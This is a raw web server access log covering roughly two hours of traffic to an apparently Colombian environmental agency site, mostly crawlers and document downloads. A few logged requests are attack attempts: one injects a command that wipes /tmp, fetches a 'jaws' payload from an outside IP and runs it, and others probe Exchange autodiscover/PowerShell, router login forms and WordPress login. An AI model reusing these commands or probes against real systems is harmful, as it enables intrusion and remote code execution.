173.252.107.21 - - [06/Apr/2023:05:30:33 -0500] "GET /images/caminos-de-los-cerros-1_optimized.jpeg HTTP/1.1" 200 49537
173.252.107.6 - - [06/Apr/2023:05:30:35 -0500] "GET /semana-santa-dias-y-horarios-para-visitar-el-camino-guadalupe-aguanoso.html HTTP/1.1" 206 943
216.245.221.92 - - [06/Apr/2023:05:30:38 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.216 - - [06/Apr/2023:05:31:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3571.pdf HTTP/1.1" 304 -
40.77.167.80 - - [06/Apr/2023:05:32:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/2148.pdf HTTP/1.1" 200 365967
201.245.192.253 - - [06/Apr/2023:05:32:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
35.204.221.1 - - [06/Apr/2023:05:33:53 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [06/Apr/2023:05:34:09 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [06/Apr/2023:05:33:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
119.155.153.137 - - [06/Apr/2023:05:35:05 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+45.81.243.34/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
172.22.2.4 - - [06/Apr/2023:05:34:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
216.245.221.92 - - [06/Apr/2023:05:35:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:05:34:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53551
66.249.70.210 - - [06/Apr/2023:05:35:50 -0500] "-" 408 -
35.204.80.241 - - [06/Apr/2023:05:35:52 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [06/Apr/2023:05:36:33 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
35.204.80.241 - - [06/Apr/2023:05:36:56 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
201.245.192.253 - - [06/Apr/2023:05:37:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [06/Apr/2023:05:37:59 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
17.22.253.78 - - [06/Apr/2023:05:40:02 -0500] "-" 408 -
201.245.192.253 - - [06/Apr/2023:05:40:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42690
201.245.192.253 - - [06/Apr/2023:05:40:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43183
216.245.221.92 - - [06/Apr/2023:05:40:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:05:39:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.107.1 - - [06/Apr/2023:05:41:29 -0500] "GET /en-semana-santa-realice-sus-tramites-ante-la-secretaria-de-ambiente-de-forma-virtual.html HTTP/1.1" 206 835
173.252.107.1 - - [06/Apr/2023:05:41:30 -0500] "GET /en-semana-santa-realice-sus-tramites-ante-la-secretaria-de-ambiente-de-forma-virtual.html HTTP/1.1" 206 835
173.252.107.17 - - [06/Apr/2023:05:41:30 -0500] "GET /images/atencion-al-ciudadano-abril.jpg HTTP/1.1" 200 116523
173.252.107.1 - - [06/Apr/2023:05:41:31 -0500] "GET /en-semana-santa-realice-sus-tramites-ante-la-secretaria-de-ambiente-de-forma-virtual.html HTTP/1.1" 206 835
172.22.2.4 - - [06/Apr/2023:05:39:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57935
201.245.192.253 - - [06/Apr/2023:05:42:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
52.167.144.167 - - [06/Apr/2023:05:43:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5258.pdf HTTP/1.1" 200 346613
173.252.111.4 - - [06/Apr/2023:05:45:21 -0500] "GET /images/Acuerdos%2001%20(1)%20(1).jpeg HTTP/1.1" 200 32884
216.245.221.92 - - [06/Apr/2023:05:45:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:05:46:26 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1037
172.22.2.4 - - [06/Apr/2023:05:44:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:05:45:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58297
201.245.192.253 - - [06/Apr/2023:05:47:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
34.91.10.255 - - [06/Apr/2023:05:48:15 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
66.249.70.210 - - [06/Apr/2023:05:48:16 -0500] "-" 408 -
172.22.2.4 - - [06/Apr/2023:05:48:32 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
40.77.167.80 - - [06/Apr/2023:05:48:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0312.pdf HTTP/1.1" 200 447253
172.22.2.4 - - [06/Apr/2023:05:48:53 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [06/Apr/2023:05:49:24 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
216.245.221.92 - - [06/Apr/2023:05:50:38 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.216 - - [06/Apr/2023:05:51:14 -0500] "GET /BLA/resoluciones/AUTOS%202013/0087.pdf HTTP/1.1" 200 309970
35.204.179.234 - - [06/Apr/2023:05:51:47 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
35.204.179.234 - - [06/Apr/2023:05:52:07 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [06/Apr/2023:05:50:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [06/Apr/2023:05:52:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [06/Apr/2023:05:51:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
216.245.221.92 - - [06/Apr/2023:05:55:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Apr/2023:05:57:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
66.249.70.210 - - [06/Apr/2023:05:58:02 -0500] "-" 408 -
172.22.2.4 - - [06/Apr/2023:05:56:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:05:57:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
157.55.39.219 - - [06/Apr/2023:05:59:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1217.pdf HTTP/1.1" 200 436803
216.245.221.92 - - [06/Apr/2023:06:00:38 -0500] "HEAD / HTTP/1.1" 200 -
66.249.70.210 - - [06/Apr/2023:06:02:37 -0500] "GET /BLA/resoluciones/AUTOS%202019/2239.pdf HTTP/1.1" 200 264494
201.245.192.253 - - [06/Apr/2023:06:02:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [06/Apr/2023:06:02:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:06:03:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
216.245.221.92 - - [06/Apr/2023:06:05:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Apr/2023:06:07:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
168.119.48.175 - - [06/Apr/2023:06:08:11 -0500] "GET / HTTP/1.1" 200 4720
168.119.48.175 - - [06/Apr/2023:06:08:13 -0500] "GET / HTTP/1.1" 200 319
186.102.72.132 - - [06/Apr/2023:06:08:28 -0500] "GET /semana-santa-dias-y-horarios-para-visitar-el-camino-guadalupe-aguanoso.html?fbclid=IwAR1H8JgGcbPHtUTVu5RPFUbnuU2ZqgyMR1aC_lWMOTfsqZ-HTRUdjhWgc_E HTTP/1.1" 200 943
172.22.2.4 - - [06/Apr/2023:06:08:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [06/Apr/2023:06:10:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:06:09:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53551
66.249.70.182 - - [06/Apr/2023:06:10:47 -0500] "-" 408 -
172.22.2.4 - - [06/Apr/2023:06:12:02 -0500] "GET /BLA/boletinlegal/Directivas/2014/Directiva%20No.%202%20del%205%20de%20Mayo%20de%202014.pdf HTTP/1.1" 200 591315
201.245.192.253 - - [06/Apr/2023:06:12:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
52.167.144.167 - - [06/Apr/2023:06:13:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4554.pdf HTTP/1.1" 200 359318
172.22.2.4 - - [06/Apr/2023:06:13:43 -0500] "GET /BLA/boletinlegal/conceptos.php HTTP/1.1" 200 7486
172.22.2.4 - - [06/Apr/2023:06:14:10 -0500] "GET /BLA/boletinlegal/js/ajax_conceptos.js HTTP/1.1" 200 1326
216.245.221.92 - - [06/Apr/2023:06:15:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:06:14:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:06:14:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
201.245.192.253 - - [06/Apr/2023:06:17:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
173.252.111.119 - - [06/Apr/2023:06:18:55 -0500] "GET /images/rendicion-de-cuentas-post-01-02-(1)_optimized.jpg HTTP/1.1" 200 121430
40.77.167.80 - - [06/Apr/2023:06:19:03 -0500] "GET /BLA/resoluciones/AUTOS%202018/5024.pdf HTTP/1.1" 200 263202
201.245.192.253 - - [06/Apr/2023:06:20:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42688
201.245.192.253 - - [06/Apr/2023:06:20:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43184
216.245.221.92 - - [06/Apr/2023:06:20:38 -0500] "HEAD / HTTP/1.1" 200 -
173.252.127.118 - - [06/Apr/2023:06:20:42 -0500] "GET /images/semana-bosques-1_optimized.1.jpg HTTP/1.1" 200 102892
172.22.2.4 - - [06/Apr/2023:06:19:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:06:20:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52316
40.77.167.211 - - [06/Apr/2023:06:22:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/4486.pdf HTTP/1.1" 200 344287
201.245.192.253 - - [06/Apr/2023:06:22:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [06/Apr/2023:06:23:47 -0500] "GET /BLA/boletinlegal/js/ajax.js HTTP/1.1" 200 772
172.22.2.4 - - [06/Apr/2023:06:23:48 -0500] "GET /BLA/boletinlegal/swfobject.js HTTP/1.1" 200 9763
201.221.172.68 - - [06/Apr/2023:06:23:51 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.221.172.68 - - [06/Apr/2023:06:23:51 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
201.221.172.68 - - [06/Apr/2023:06:23:51 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
216.245.221.92 - - [06/Apr/2023:06:25:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:06:25:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [06/Apr/2023:06:27:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [06/Apr/2023:06:26:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
207.46.13.216 - - [06/Apr/2023:06:29:08 -0500] "GET /bla/resoluciones/resoluciones%202012/0387.pdf HTTP/1.1" 304 -
45.83.66.226 - - [06/Apr/2023:06:29:25 -0500] "GET / HTTP/1.1" 200 319
45.83.64.79 - - [06/Apr/2023:06:29:25 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
154.85.124.115 - - [06/Apr/2023:06:29:29 -0500] "HEAD /como-obtener-el-certificado-de-estado-de-conservacion-ambiental-ceca.html HTTP/1.1" 200 -
41.214.58.59 - - [06/Apr/2023:06:29:30 -0500] "HEAD /mejora-la-calidad-del-aire-condiciones-meteorologicas-favorables-permiten-levantar-la-alerta-preventiva.html HTTP/1.1" 200 -
201.245.192.253 - - [06/Apr/2023:06:30:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42688
201.245.192.253 - - [06/Apr/2023:06:30:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43184
216.245.221.92 - - [06/Apr/2023:06:30:38 -0500] "HEAD / HTTP/1.1" 200 -
51.15.164.30 - - [06/Apr/2023:06:32:23 -0500] "HEAD /como-obtener-el-certificado-de-estado-de-conservacion-ambiental-ceca.html HTTP/1.1" 200 -
217.182.175.162 - - [06/Apr/2023:06:32:26 -0500] "HEAD /mejora-la-calidad-del-aire-condiciones-meteorologicas-favorables-permiten-levantar-la-alerta-preventiva.html HTTP/1.1" 200 -
201.245.192.253 - - [06/Apr/2023:06:32:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [06/Apr/2023:06:32:50 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [06/Apr/2023:06:31:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:06:33:40 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [06/Apr/2023:06:32:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52720
172.22.2.4 - - [06/Apr/2023:06:34:55 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [06/Apr/2023:06:35:05 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
216.245.221.92 - - [06/Apr/2023:06:35:38 -0500] "HEAD / HTTP/1.1" 200 -
35.204.221.1 - - [06/Apr/2023:06:36:25 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [06/Apr/2023:06:36:51 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
35.204.103.49 - - [06/Apr/2023:06:36:56 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [06/Apr/2023:06:37:11 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
201.245.192.253 - - [06/Apr/2023:06:37:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
34.91.36.176 - - [06/Apr/2023:06:38:41 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [06/Apr/2023:06:37:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
35.204.179.234 - - [06/Apr/2023:06:39:06 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [06/Apr/2023:06:39:21 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [06/Apr/2023:06:38:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53551
66.249.70.210 - - [06/Apr/2023:06:40:02 -0500] "-" 408 -
201.245.192.253 - - [06/Apr/2023:06:40:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42688
201.245.192.253 - - [06/Apr/2023:06:40:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43184
172.22.2.4 - - [06/Apr/2023:06:40:26 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
216.245.221.92 - - [06/Apr/2023:06:40:38 -0500] "HEAD / HTTP/1.1" 200 -
34.91.10.255 - - [06/Apr/2023:06:41:07 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
35.204.179.234 - - [06/Apr/2023:06:41:33 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [06/Apr/2023:06:42:13 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [06/Apr/2023:06:42:23 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
201.245.192.253 - - [06/Apr/2023:06:42:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
34.91.10.255 - - [06/Apr/2023:06:42:48 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
17.22.237.153 - - [06/Apr/2023:06:42:58 -0500] "-" 408 -
172.22.2.4 - - [06/Apr/2023:06:43:14 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
157.55.39.216 - - [06/Apr/2023:06:44:38 -0500] "GET /semana-santa-dias-y-horarios-para-visitar-el-camino-guadalupe-aguanoso.html HTTP/1.1" 200 943
66.249.70.180 - - [06/Apr/2023:06:44:49 -0500] "-" 408 -
172.22.2.4 - - [06/Apr/2023:06:43:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [06/Apr/2023:06:45:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:06:44:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53551
221.180.143.11 - - [06/Apr/2023:06:47:00 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [06/Apr/2023:06:47:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
69.63.184.2 - - [06/Apr/2023:06:49:15 -0500] "GET /images/mejora-la-calidad-del-aire-en-bogota-5-abril.jpeg HTTP/1.1" 200 44341
221.180.143.11 - - [06/Apr/2023:06:49:21 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [06/Apr/2023:06:50:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:06:49:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:06:49:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
201.245.192.253 - - [06/Apr/2023:06:52:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
40.77.167.101 - - [06/Apr/2023:06:54:11 -0500] "-" 408 -
52.167.144.87 - - [06/Apr/2023:06:54:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5089.pdf HTTP/1.1" 200 346697
216.245.221.92 - - [06/Apr/2023:06:55:38 -0500] "HEAD / HTTP/1.1" 200 -
201.93.22.122 - - [06/Apr/2023:06:56:21 -0500] "GET /inicia-la-convocatoria-2023-para-el-panel-distrital-de-cambio-climatico.html HTTP/1.1" 200 887
172.22.2.4 - - [06/Apr/2023:06:54:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:06:55:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58653
201.245.192.253 - - [06/Apr/2023:06:57:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
40.77.167.80 - - [06/Apr/2023:06:58:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2903.pdf HTTP/1.1" 304 -
185.180.143.72 - - [06/Apr/2023:06:59:52 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
216.245.221.92 - - [06/Apr/2023:07:00:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:07:00:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [06/Apr/2023:07:02:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [06/Apr/2023:07:01:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
216.245.221.92 - - [06/Apr/2023:07:05:38 -0500] "HEAD / HTTP/1.1" 200 -
173.252.83.16 - - [06/Apr/2023:07:07:13 -0500] "GET /images/cr\xc3\xb3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
173.252.83.119 - - [06/Apr/2023:07:07:21 -0500] "GET /galeria/galeria/fotos/tortuga2P.jpg HTTP/1.1" 200 33472
201.245.192.253 - - [06/Apr/2023:07:07:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [06/Apr/2023:07:06:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.70.182 - - [06/Apr/2023:07:08:34 -0500] "-" 408 -
207.46.13.216 - - [06/Apr/2023:07:08:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4388.pdf HTTP/1.1" 304 -
109.70.100.9 - - [06/Apr/2023:07:09:00 -0500] "GET /wp-login.php HTTP/1.1" 404 1034
172.22.2.4 - - [06/Apr/2023:07:07:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
157.55.39.219 - - [06/Apr/2023:07:09:14 -0500] "GET /BLA/resoluciones/AUTOS%202022/5750.pdf HTTP/1.1" 200 462837
31.13.127.112 - - [06/Apr/2023:07:09:52 -0500] "GET /images/mejora-la-calidad-del-aire-en-bogota-5-abril.jpeg HTTP/1.1" 200 44341
216.245.221.92 - - [06/Apr/2023:07:10:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Apr/2023:07:12:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [06/Apr/2023:07:13:31 -0500] "GET /BLA/boletinlegal/autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1" 404 1018
52.167.144.87 - - [06/Apr/2023:07:13:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4744.pdf HTTP/1.1" 304 -
172.22.2.4 - - [06/Apr/2023:07:12:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:07:13:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58297
216.245.221.92 - - [06/Apr/2023:07:15:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Apr/2023:07:17:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
207.46.13.216 - - [06/Apr/2023:07:18:12 -0500] "GET /BLA/resoluciones/AUTOS%202022/4998.pdf HTTP/1.1" 200 490345
69.63.184.116 - - [06/Apr/2023:07:19:37 -0500] "GET /images/WhatsApp%20Image%202023-04-05%20at%2013.54.41.jpeg HTTP/1.1" 200 210747
172.22.2.4 - - [06/Apr/2023:07:18:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [06/Apr/2023:07:20:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42879
201.245.192.253 - - [06/Apr/2023:07:20:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43200
216.245.221.92 - - [06/Apr/2023:07:20:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:07:19:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59646
37.221.92.204 - - [06/Apr/2023:07:20:43 -0500] "POST /boaform/admin/formLogin HTTP/1.1" 404 1186
201.245.192.253 - - [06/Apr/2023:07:22:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
173.252.107.3 - - [06/Apr/2023:07:22:49 -0500] "GET /no-te-pierdas-la-jornada-de-avistamiento-de-aves-en-el-humedal-santa-maria-del-lago.html HTTP/1.1" 206 1003
173.252.107.119 - - [06/Apr/2023:07:23:10 -0500] "GET /avistamiento-de-aves-en-santa-maria-del-lago.html HTTP/1.1" 206 845
35.204.221.1 - - [06/Apr/2023:07:24:01 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
216.245.221.92 - - [06/Apr/2023:07:25:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:07:24:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
34.91.10.255 - - [06/Apr/2023:07:25:52 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [06/Apr/2023:07:25:59 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [06/Apr/2023:07:24:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
172.22.2.4 - - [06/Apr/2023:07:26:43 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
201.245.192.253 - - [06/Apr/2023:07:27:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
157.90.251.233 - - [06/Apr/2023:07:27:48 -0500] "GET / HTTP/1.1" 200 319
157.90.251.233 - - [06/Apr/2023:07:27:49 -0500] "GET / HTTP/1.1" 200 4720
173.252.107.7 - - [06/Apr/2023:07:29:38 -0500] "GET /inscribete-y-participa-en-las-caminatas-ecologicas-de-marzo.html HTTP/1.1" 206 924
173.252.111.4 - - [06/Apr/2023:07:29:38 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
173.252.87.9 - - [06/Apr/2023:07:29:52 -0500] "GET /images/avistamiento-aves-humedal-juan-amarillo-3-febrero.jpg HTTP/1.1" 200 45352
201.245.192.253 - - [06/Apr/2023:07:30:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42879
201.245.192.253 - - [06/Apr/2023:07:30:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43200
173.252.107.23 - - [06/Apr/2023:07:30:19 -0500] "GET /secretaria-de-ambiente-hace-seguimiento-de-control-a-licencias-ambientales-otorgadas.html HTTP/1.1" 206 1013
173.252.107.120 - - [06/Apr/2023:07:30:19 -0500] "GET /images/operativo-licencias-ambientales-5-noviembre%20.jpg HTTP/1.1" 200 38992
173.252.107.11 - - [06/Apr/2023:07:30:20 -0500] "GET /images/operativo-licencias-ambientales-5-noviembre%20.jpg HTTP/1.1" 200 38992
216.245.221.92 - - [06/Apr/2023:07:30:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Apr/2023:07:29:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
190.27.98.5 - - [06/Apr/2023:07:32:20 -0500] "GET /agendate-para-participar-en-las-caminatas-ecologicas-de-febrero.html HTTP/1.1" 200 830
172.22.2.4 - - [06/Apr/2023:07:30:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57935
201.245.192.253 - - [06/Apr/2023:07:32:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
185.209.161.153 - - [06/Apr/2023:07:35:03 -0500] "POST /boaform/admin/formLogin HTTP/1.1" 404 1186
216.245.221.92 - - [06/Apr/2023:07:35:38 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.216 - - [06/Apr/2023:07:35:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2838.pdf HTTP/1.1" 304 -
207.46.13.216 - - [06/Apr/2023:07:35:54 -0500] "GET /BLA/resoluciones/AUTOS%202008/0287.pdf HTTP/1.1" 304 -
172.22.2.4 - - [06/Apr/2023:07:35:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
